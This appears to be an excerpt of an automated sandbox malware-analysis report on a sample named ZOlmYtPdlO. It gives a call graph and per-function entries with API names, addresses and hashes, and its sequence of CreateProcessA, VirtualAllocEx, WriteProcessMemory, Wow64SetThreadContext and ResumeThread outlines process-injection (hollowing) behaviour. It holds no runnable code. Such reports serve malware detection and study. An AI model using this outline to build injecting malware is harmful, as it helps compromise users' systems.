VirtualAllocEx 36185->36187 36186->36185 36187->36185 36192 69c9f03 36190->36192 36191 69ca744 36192->36191 36193 69c7508 VirtualAllocEx 36192->36193 36194 69c7501 VirtualAllocEx 36192->36194 36193->36192 36194->36192 36196 69ca40d 36195->36196 36197 69ca46d 36195->36197 36196->36195 36203 69c7379 ResumeThread 36196->36203 36204 69c7380 ResumeThread 36196->36204 36198 69ca3ea 36197->36198 36201 69c7508 VirtualAllocEx 36197->36201 36202 69c7501 VirtualAllocEx 36197->36202 36199 69c7508 VirtualAllocEx 36198->36199 36200 69c7501 VirtualAllocEx 36198->36200 36199->36198 36200->36198 36201->36198 36202->36198 36203->36196 36204->36196 36206 69c9f03 36205->36206 36207 69c7508 VirtualAllocEx 36206->36207 36208 69c7501 VirtualAllocEx 36206->36208 36207->36206 36208->36206 36210 69ca517 36209->36210 36309 69c7429 36210->36309 36313 69c7430 36210->36313 36211 69ca532 36215 69c9eeb 36214->36215 36216 69c7508 VirtualAllocEx 36215->36216 36217 69c7501 VirtualAllocEx 36215->36217 36216->36215 36217->36215 36219 69ca69d 36218->36219 36317 69c75c8 36219->36317 36321 69c75c1 36219->36321 36220 69ca6c1 36225 69c75c8 WriteProcessMemory 36223->36225 36226 69c75c1 WriteProcessMemory 36223->36226 36224 69ca080 36225->36224 36226->36224 36228 69ca340 36227->36228 36231 69c76b8 ReadProcessMemory 36228->36231 36232 69c76b0 ReadProcessMemory 36228->36232 36229 69ca744 36230 69c9f03 36230->36229 36233 69c7508 VirtualAllocEx 36230->36233 36234 69c7501 VirtualAllocEx 36230->36234 36231->36230 36232->36230 36233->36230 36234->36230 36236 69c9fad 36235->36236 36236->36105 36238 69c9e93 36236->36238 36239 69c75c8 WriteProcessMemory 36236->36239 36240 69c75c1 WriteProcessMemory 36236->36240 36237 69ca7c7 36238->36105 36239->36237 36240->36237 36325 69c7844 36241->36325 36330 69c7850 36241->36330 36246 69ca002 36245->36246 36248 69c75c8 WriteProcessMemory 36246->36248 36249 69c75c1 WriteProcessMemory 36246->36249 36247 69ca7c7 36248->36247 36249->36247 36251 69c9f87 36250->36251 36253 69c75c8 WriteProcessMemory 36251->36253 36254 69c75c1 WriteProcessMemory 36251->36254 36252 69ca6c1 36253->36252 36254->36252 36256 69ca5d3 36255->36256 36266 69c7429 Wow64SetThreadContext 36256->36266 36267 69c7430 Wow64SetThreadContext 36256->36267 36257 69ca83a 36257->36105 36258 69ca295 36258->36257 36262 69c7379 ResumeThread 36258->36262 36263 69c7380 ResumeThread 36258->36263 36259 69ca40d 36260 69ca46d 36259->36260 36268 69c7379 ResumeThread 36259->36268 36269 69c7380 ResumeThread 36259->36269 36261 69ca3ea 36260->36261 36264 69c7508 VirtualAllocEx 36260->36264 36265 69c7501 VirtualAllocEx 36260->36265 36270 69c7508 VirtualAllocEx 36261->36270 36271 69c7501 VirtualAllocEx 36261->36271 36262->36259 36263->36259 36264->36261 36265->36261 36266->36258 36267->36258 36268->36259 36269->36259 36270->36261 36271->36261 36273 69ca284 36272->36273 36281 69c7379 ResumeThread 36273->36281 36282 69c7380 ResumeThread 36273->36282 36274 69ca40d 36275 69ca46d 36274->36275 36277 69c7379 ResumeThread 36274->36277 36278 69c7380 ResumeThread 36274->36278 36276 69ca3ea 36275->36276 36283 69c7508 VirtualAllocEx 36275->36283 36284 69c7501 VirtualAllocEx 36275->36284 36279 69c7508 VirtualAllocEx 36276->36279 36280 69c7501 VirtualAllocEx 36276->36280 36277->36274 36278->36274 36279->36276 36280->36276 36281->36274 36282->36274 36283->36276 36284->36276 36286 69c7381 ResumeThread 36285->36286 36288 69c73f1 36286->36288 36288->36171 36290 69c73c0 ResumeThread 36289->36290 36292 69c73f1 36290->36292 36292->36171 36294 69c7509 VirtualAllocEx 36293->36294 36296 69c7585 36294->36296 36296->36173 36298 69c7548 VirtualAllocEx 36297->36298 36300 69c7585 36298->36300 36300->36173 36302 69c7703 ReadProcessMemory 36301->36302 36304 69c7747 36302->36304 36304->36185 36306 69c76b9 ReadProcessMemory 36305->36306 36308 69c7747 36306->36308 36308->36185 36310 69c7431 Wow64SetThreadContext 36309->36310 36312 69c74bd 36310->36312 36312->36211 36314 69c7475 Wow64SetThreadContext 36313->36314 36316 69c74bd 36314->36316 36316->36211 36318 69c7610 WriteProcessMemory 36317->36318 36320 69c7667 36318->36320 36320->36220 36322 69c75c9 WriteProcessMemory 36321->36322 36324 69c7667 36322->36324 36324->36220 36327 69c784d 36325->36327 36326 69c77e8 36326->36105 36327->36326 36328 69c7a3e CreateProcessA 36327->36328 36329 69c7a9b 36328->36329 36329->36329 36331 69c78d9 CreateProcessA 36330->36331 36333 69c7a9b 36331->36333 36333->36333 36386 4ce39a0 36388 4ce39d1 36386->36388 36387 4ce39e9 36388->36387 36392 4ce4550 36388->36392 36397 4ce4560 36388->36397 36389 4ce3afc 36393 4ce4518 36392->36393 36394 4ce4553 36392->36394 36393->36389 36400 4ce2f9c 36394->36400 36398 4ce457d 36397->36398 36399 4ce2f9c DrawTextExW 36397->36399 36398->36389 36399->36398 36401 4ce4598 DrawTextExW 36400->36401 36403 4ce457d 36401->36403 36403->36389

                                                      Executed Functions

                                                      Function 0094D4A9 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 94d4a9-94d547 GetCurrentProcess 309 94d550-94d584 GetCurrentThread 304->309 310 94d549-94d54f 304->310 311 94d586-94d58c 309->311 312 94d58d-94d5c1 GetCurrentProcess 309->312 310->309 311->312 314 94d5c3-94d5c9 312->314 315 94d5ca-94d5e5 call 94d687 312->315 314->315 317 94d5eb-94d61a GetCurrentThreadId 315->317 319 94d623-94d685 317->319 320 94d61c-94d622 317->320 320->319
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D536
                                                      • GetCurrentThread.KERNEL32 ref: 0094D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D609
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 00a089a2cb2a66c7d3fe0913521d3e5ed771f9486213387296142b5112343512
                                                      • Instruction ID: 3b15a5a39782878258281f49fc031a1337692c16e5c7adeff8d56abfef441208
                                                      • Opcode Fuzzy Hash: 00a089a2cb2a66c7d3fe0913521d3e5ed771f9486213387296142b5112343512
                                                      • Instruction Fuzzy Hash: 1C5188B09013488FDB14DFA9D548BAEBBF5EF88304F20C06AE448A7364DB749984CF65
                                                      Function 0094D4B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 327 94d4b8-94d547 GetCurrentProcess 331 94d550-94d584 GetCurrentThread 327->331 332 94d549-94d54f 327->332 333 94d586-94d58c 331->333 334 94d58d-94d5c1 GetCurrentProcess 331->334 332->331 333->334 336 94d5c3-94d5c9 334->336 337 94d5ca-94d5e5 call 94d687 334->337 336->337 339 94d5eb-94d61a GetCurrentThreadId 337->339 341 94d623-94d685 339->341 342 94d61c-94d622 339->342 342->341
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D536
                                                      • GetCurrentThread.KERNEL32 ref: 0094D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D609
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 1a4e3dba9d4fef44e80c6dd45420e9b15b8a04a2fda653c2b4b5ca5844644510
                                                      • Instruction ID: edfb166b99bc1eb91b708fb0719b232cd2f71d503756ab38b6e505588fb3079f
                                                      • Opcode Fuzzy Hash: 1a4e3dba9d4fef44e80c6dd45420e9b15b8a04a2fda653c2b4b5ca5844644510
                                                      • Instruction Fuzzy Hash: 985167B09013098FDB14DFAAD548BAEBBF5EF88304F20C059E459A7360DB759984CF65
                                                      Function 069C7844 Relevance: 1.8, APIs: 1, Instructions: 273processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 501 69c7844-69c784d 503 69c784f-69c78e5 501->503 504 69c77e8-69c780a 501->504 510 69c791e-69c793e 503->510 511 69c78e7-69c78f1 503->511 508 69c780c-69c7812 504->508 509 69c7813-69c7838 504->509 508->509 521 69c7977-69c79a6 510->521 522 69c7940-69c794a 510->522 511->510 512 69c78f3-69c78f5 511->512 515 69c7918-69c791b 512->515 516 69c78f7-69c7901 512->516 515->510 518 69c7905-69c7914 516->518 519 69c7903 516->519 518->518 523 69c7916 518->523 519->518 528 69c79df-69c7a99 CreateProcessA 521->528 529 69c79a8-69c79b2 521->529 522->521 524 69c794c-69c794e 522->524 523->515 526 69c7950-69c795a 524->526 527 69c7971-69c7974 524->527 530 69c795c 526->530 531 69c795e-69c796d 526->531 527->521 542 69c7a9b-69c7aa1 528->542 543 69c7aa2-69c7b28 528->543 529->528 533 69c79b4-69c79b6 529->533 530->531 531->531 532 69c796f 531->532 532->527 534 69c79b8-69c79c2 533->534 535 69c79d9-69c79dc 533->535 537 69c79c4 534->537 538 69c79c6-69c79d5 534->538 535->528 537->538 538->538 540 69c79d7 538->540 540->535 542->543 553 69c7b38-69c7b3c 543->553 554 69c7b2a-69c7b2e 543->554 556 69c7b4c-69c7b50 553->556 557 69c7b3e-69c7b42 553->557 554->553 555 69c7b30 554->555 555->553 559 69c7b60-69c7b64 556->559 560 69c7b52-69c7b56 556->560 557->556 558 69c7b44 557->558 558->556 562 69c7b76-69c7b7d 559->562 563 69c7b66-69c7b6c 559->563 560->559 561 69c7b58 560->561 561->559 564 69c7b7f-69c7b8e 562->564 565 69c7b94 562->565 563->562 564->565 567 69c7b95 565->567 567->567
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069C7A86
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: c2510547228e339ea094d3b12ce5345d33120e67a35d758e1e2556b939c9248c
                                                      • Instruction ID: 0949f9d9d1deb246a77f06d3064c9acff80d523fbe03087c9dd3bc515ec93780
                                                      • Opcode Fuzzy Hash: c2510547228e339ea094d3b12ce5345d33120e67a35d758e1e2556b939c9248c
                                                      • Instruction Fuzzy Hash: E5B18071D00219CFDF50CFA9C8417EEBBB6BF44324F148569E848AB650DB749985CF92
                                                      Function 069C7850 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 568 69c7850-69c78e5 570 69c791e-69c793e 568->570 571 69c78e7-69c78f1 568->571 578 69c7977-69c79a6 570->578 579 69c7940-69c794a 570->579 571->570 572 69c78f3-69c78f5 571->572 573 69c7918-69c791b 572->573 574 69c78f7-69c7901 572->574 573->570 576 69c7905-69c7914 574->576 577 69c7903 574->577 576->576 580 69c7916 576->580 577->576 585 69c79df-69c7a99 CreateProcessA 578->585 586 69c79a8-69c79b2 578->586 579->578 581 69c794c-69c794e 579->581 580->573 583 69c7950-69c795a 581->583 584 69c7971-69c7974 581->584 587 69c795c 583->587 588 69c795e-69c796d 583->588 584->578 599 69c7a9b-69c7aa1 585->599 600 69c7aa2-69c7b28 585->600 586->585 590 69c79b4-69c79b6 586->590 587->588 588->588 589 69c796f 588->589 589->584 591 69c79b8-69c79c2 590->591 592 69c79d9-69c79dc 590->592 594 69c79c4 591->594 595 69c79c6-69c79d5 591->595 592->585 594->595 595->595 597 69c79d7 595->597 597->592 599->600 610 69c7b38-69c7b3c 600->610 611 69c7b2a-69c7b2e 600->611 613 69c7b4c-69c7b50 610->613 614 69c7b3e-69c7b42 610->614 611->610 612 69c7b30 611->612 612->610 616 69c7b60-69c7b64 613->616 617 69c7b52-69c7b56 613->617 614->613 615 69c7b44 614->615 615->613 619 69c7b76-69c7b7d 616->619 620 69c7b66-69c7b6c 616->620 617->616 618 69c7b58 617->618 618->616 621 69c7b7f-69c7b8e 619->621 622 69c7b94 619->622 620->619 621->622 624 69c7b95 622->624 624->624
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069C7A86
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: a262a1fb402523434157707b2da5be12cebe5c9074bde128c9428df41d2382a5
                                                      • Instruction ID: ae1a0e09d53680cb4b1dc120c36766a0bc9e6653136d0dd4ee93264af79e53b7
                                                      • Opcode Fuzzy Hash: a262a1fb402523434157707b2da5be12cebe5c9074bde128c9428df41d2382a5
                                                      • Instruction Fuzzy Hash: 2B919071D00219DFDF54CFA8C841BEDBBB6BF48320F1485A9E848AB650DB749985CF92
                                                      Function 0094B230 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 625 94b230-94b23f 626 94b241-94b24e call 94ac04 625->626 627 94b26b-94b26f 625->627 632 94b264 626->632 633 94b250 626->633 629 94b271-94b27b 627->629 630 94b283-94b2c4 627->630 629->630 636 94b2c6-94b2ce 630->636 637 94b2d1-94b2df 630->637 632->627 686 94b256 call 94b4c8 633->686 687 94b256 call 94b4b9 633->687 636->637 638 94b2e1-94b2e6 637->638 639 94b303-94b305 637->639 641 94b2f1 638->641 642 94b2e8-94b2ef call 94ac10 638->642 643 94b308-94b30f 639->643 640 94b25c-94b25e 640->632 644 94b3a0-94b3b9 640->644 646 94b2f3-94b301 641->646 642->646 647 94b311-94b319 643->647 648 94b31c-94b323 643->648 658 94b3bb-94b418 644->658 646->643 647->648 650 94b325-94b32d 648->650 651 94b330-94b339 call 94ac20 648->651 650->651 656 94b346-94b34b 651->656 657 94b33b-94b343 651->657 659 94b34d-94b354 656->659 660 94b369-94b376 656->660 657->656 676 94b41a-94b41c 658->676 659->660 661 94b356-94b366 call 94ac30 call 94ac40 659->661 667 94b378-94b396 660->667 668 94b399-94b39f 660->668 661->660 667->668 677 94b41e 676->677 678 94b448-94b460 676->678 681 94b420-94b421 677->681 682 94b422-94b446 677->682 679 94b462-94b465 678->679 680 94b468-94b493 GetModuleHandleW 678->680 679->680 683 94b495-94b49b 680->683 684 94b49c-94b4b0 680->684 681->682 682->678 683->684 686->640 687->640
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B486
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: aabf2fee56ff9039a33f1ed3f43901cb719a73a03c5643a09f25c232d1589402
                                                      • Instruction ID: dd9b8dbfbbb523b6bbfa2523081a8b9b39576827db9f6804b03d681a93cc1387
                                                      • Opcode Fuzzy Hash: aabf2fee56ff9039a33f1ed3f43901cb719a73a03c5643a09f25c232d1589402
                                                      • Instruction Fuzzy Hash: 22816970A00B458FD724DF6AC045BAABBF5FF88304F008A2ED08AD7A51D775E949CB91
                                                      Function 00944610 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 798 944610-945f11 CreateActCtxA 801 945f13-945f19 798->801 802 945f1a-945f74 798->802 801->802 809 945f76-945f79 802->809 810 945f83-945f87 802->810 809->810 811 945f98 810->811 812 945f89-945f95 810->812 814 945f99 811->814 812->811 814->814
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00945F01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 18259cbc85ab64beede3fc750f58253900729e60f543a7518b4e722301ad5e32
                                                      • Instruction ID: 1af3efa141fbd355127b409deb358d6758aadc059b18ffb82329eaecdc010cc6
                                                      • Opcode Fuzzy Hash: 18259cbc85ab64beede3fc750f58253900729e60f543a7518b4e722301ad5e32
                                                      • Instruction Fuzzy Hash: 2541F2B0C0071DDFDB24DFA9C944B9DBBB9BF44304F24809AE408AB255DBB56989CF91
                                                      Function 00945E44 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 815 945e44-945e47 816 945e54-945f11 CreateActCtxA 815->816 818 945f13-945f19 816->818 819 945f1a-945f74 816->819 818->819 826 945f76-945f79 819->826 827 945f83-945f87 819->827 826->827 828 945f98 827->828 829 945f89-945f95 827->829 831 945f99 828->831 829->828 831->831
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00945F01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 08e5e7ae2359465262359858faa40940b844d2fff518169da221a7e71a0d7a65
                                                      • Instruction ID: 9fdcc350bb8ebc06db6f9d10bb08336a6a19e9087b48b743768edf5ab62054a8
                                                      • Opcode Fuzzy Hash: 08e5e7ae2359465262359858faa40940b844d2fff518169da221a7e71a0d7a65
                                                      • Instruction Fuzzy Hash: 4141C2B0C00719CFDB24DFA9C944BDDBBB5BF48304F24809AD448AB265DBB56989CF91
                                                      Function 04CE2F9C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 832 4ce2f9c-4ce45e4 834 4ce45ef-4ce45fe 832->834 835 4ce45e6-4ce45ec 832->835 836 4ce4603-4ce463c DrawTextExW 834->836 837 4ce4600 834->837 835->834 838 4ce463e-4ce4644 836->838 839 4ce4645-4ce4662 836->839 837->836 838->839
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CE457D,?,?), ref: 04CE462F
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1769321176.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4ce0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 4579198e97e55a99183154a0045fa21efe5df3d0b2084fa645952c85fa5d56ec
                                                      • Instruction ID: 2aa8e551f2ea19977cc3a1948fba4b4cb43f783573abe3ff91cae4f938477e6f
                                                      • Opcode Fuzzy Hash: 4579198e97e55a99183154a0045fa21efe5df3d0b2084fa645952c85fa5d56ec
                                                      • Instruction Fuzzy Hash: 5431E2B5D013499FDB14CF9AD884AAEBBF5FB48310F14842AE919A7310D774A944CFA4
                                                      Function 04CE4590 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CE457D,?,?), ref: 04CE462F
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1769321176.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4ce0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 452acf6f55fb0cc29fe2ae94075ac222a92942a1c0954b7a7ad3cf4442466fbc
                                                      • Instruction ID: 4e2f89f6d2ab92005e9f1094db375729610f80fb6f0488f3521fd4b5dfccb43a
                                                      • Opcode Fuzzy Hash: 452acf6f55fb0cc29fe2ae94075ac222a92942a1c0954b7a7ad3cf4442466fbc
                                                      • Instruction Fuzzy Hash: B83100B5D00209DFCB10CF9AD984AEEBBF5BB48320F14842AE818A7210D774A944CFA4
                                                      Function 069C75C1 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069C7658
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 2bb4cdfa27cebc7138f53031653ae9de955fab5919c02d73dd3fa41d3f7418db
                                                      • Instruction ID: b16416581c2e20588cacd988631a5bac3196404faa3516c9d2cd6c747ed6717f
                                                      • Opcode Fuzzy Hash: 2bb4cdfa27cebc7138f53031653ae9de955fab5919c02d73dd3fa41d3f7418db
                                                      • Instruction Fuzzy Hash: 322126B59003499FCB10CFA9C984BEEBBF5FB48320F10842AE918A7251D7789944CBA5
                                                      Function 069C75C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069C7658
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: b3bc103298d4541ebcc4aaf2bd023ba224ad47560f1a4c22aaa1cebde555b296
                                                      • Instruction ID: 6007c5c8e162063bafe0cd7c7696215eab4c28225102143b7f6c64df89f61baa
                                                      • Opcode Fuzzy Hash: b3bc103298d4541ebcc4aaf2bd023ba224ad47560f1a4c22aaa1cebde555b296
                                                      • Instruction Fuzzy Hash: D52144B19003499FCB10CFA9C984BEEBBF5FF48320F10842AE918A7251D7789944CFA5
                                                      Function 0094D6F8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D787
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: c431ffd1d6bae8637d811d9a68de77d9b2136c0bf51fe211ee2d382ea1e77608
                                                      • Instruction ID: 00c64bc5e57baa35b55ed5ee5068b61594d1be2c48e26eb719219dff1d54dd98
                                                      • Opcode Fuzzy Hash: c431ffd1d6bae8637d811d9a68de77d9b2136c0bf51fe211ee2d382ea1e77608
                                                      • Instruction Fuzzy Hash: 782103B59003089FDB10CF9AD984AEEBBF8EB48310F10841AE918A3310D378A950CFA0
                                                      Function 069C76B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069C7738
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: e898eeed205f6b4231882f239793b4bb408715be4be4903fa4b87233a0932089
                                                      • Instruction ID: 4d60130a098db2fc742292bf1dd231c0bf7fe5bc4d424e33b0b055cf925005b0
                                                      • Opcode Fuzzy Hash: e898eeed205f6b4231882f239793b4bb408715be4be4903fa4b87233a0932089
                                                      • Instruction Fuzzy Hash: 01214AB1C003599FCB10DFAAC9856EEBBF5FF88320F10842AE518A7250D7759544CFA1
                                                      Function 069C7429 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C74AE
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 895269995fbd01015ffb6d0507092990e6df4b19876c7cd642a0abe2cc340620
                                                      • Instruction ID: 03eb71be66a4a098dedb689c19556c64da01eb649526ec61d2bf67333bf19761
                                                      • Opcode Fuzzy Hash: 895269995fbd01015ffb6d0507092990e6df4b19876c7cd642a0abe2cc340620
                                                      • Instruction Fuzzy Hash: FF2157B1D003088FDB10DFAAC4847EEBBF5AF88324F10842AD459A7240CB789944CFA5
                                                      Function 069C76B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069C7738
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 7dc9cac56b8dd27f551762b189cb9fee2b89d90b3ad936ad13b2c344bcecac38
                                                      • Instruction ID: 14f07380b64e4e4c89921009c6407590011b01c7fa0a6c478be9782c75678e98
                                                      • Opcode Fuzzy Hash: 7dc9cac56b8dd27f551762b189cb9fee2b89d90b3ad936ad13b2c344bcecac38
                                                      • Instruction Fuzzy Hash: 242116B18003599FCB10DFAAC885AEEBBF5FF48320F108429E559A7250C7749944DFA5
                                                      Function 069C7430 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C74AE
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: fe13cf04aaaebaa8a69918a83f7c7807bcad7e41629e6f3b2ee85ce0edabcc65
                                                      • Instruction ID: 2d0b6d2f37e0d17540f499493ba18dd213b5866638c92d5a8676c4bcece0aa0f
                                                      • Opcode Fuzzy Hash: fe13cf04aaaebaa8a69918a83f7c7807bcad7e41629e6f3b2ee85ce0edabcc65
